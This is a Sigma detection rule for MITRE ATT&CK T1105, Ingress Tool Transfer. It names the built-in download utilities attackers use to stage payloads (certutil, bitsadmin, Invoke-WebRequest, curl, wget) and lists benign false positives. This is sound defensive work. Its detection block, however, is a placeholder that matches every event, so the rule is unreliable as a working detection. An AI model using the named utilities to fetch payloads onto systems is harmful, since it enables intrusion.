title: Ingress Tool Transfer (T1105)
id: df00tech-t1105
status: experimental
description: "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools may be pulled via the C2 channel or through alternate protocols using built-in OS utilities (certutil, bitsadmin, PowerShell Invoke-WebRequest, curl, wget, scp). Threat actors including HAFNIUM, Fox Kitten, and Cobalt Group have leveraged this technique to stage second-stage payloads, implants, and post-exploitation toolkits onto victim systems."
references:
  - https://attack.mitre.org/techniques/T1105/
  - https://df00tech.com/detections/T1105
author: df00tech
date: 2026/04/17
tags:
  - attack.t1105
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Software deployment tools (SCCM, Intune, Chocolatey, winget) using certutil or bitsadmin to stage installers into Temp directories"
  - IT administrators using certutil -urlcache or Invoke-WebRequest for legitimate patch management or inventory scripts
  - "Developer toolchains (npm, pip, gradle) spawning curl or wget to download build dependencies to temp locations"
  - "Monitoring and backup agents (CrowdStrike, SolarWinds, Veeam) that periodically download update packages using BitsTransfer"
  - Security scanning tools that use built-in download utilities for OSINT enrichment or threat intel feed ingestion
level: high